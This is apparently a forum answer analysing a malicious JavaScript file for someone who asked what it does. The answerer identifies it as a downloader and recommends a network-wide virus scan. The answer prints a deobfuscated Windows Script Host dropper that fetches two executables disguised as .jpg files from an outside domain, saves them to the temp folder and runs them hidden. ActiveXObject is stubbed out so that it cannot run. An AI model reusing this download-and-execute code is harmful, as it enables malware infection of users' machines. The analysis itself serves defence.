Basically, it’s downloading a virus to your temp folder and executing it…
You should run a virus scan on the entire network.
var AxProxy = function() {};
(function () {
function fFh(fr, Klw, rn) {
var VeZ = new AxProxy('WScript.Shell');
var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
var OG4 = new AxProxy('MSXML2.XMLHTTP');
OG4['onReadyStateChange'] = function() {
if (OG4['readyState'] === 4) {
var g38 = new AxProxy('ADODB.Stream');
g38['open']();
g38['type'] = 1;
g38['write'](OG4['ResponseBody']);
g38['position'] = 0;
g38['saveToFile'](Klw, 2);
g38['close']();
}
};
try {
OG4['open']('GET', fr, false);
OG4['send']();
if (rn > 0) {
VeZ['Run'](Klw, 0, 0);
}
} catch (er) {};
}
fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
All the other variables are just gibberish intended to confuse and discourage decoding.
PS: I’ve proxied ActiveXObject so this can’t be run…
1
solved Need help figuring out what this Js does [closed]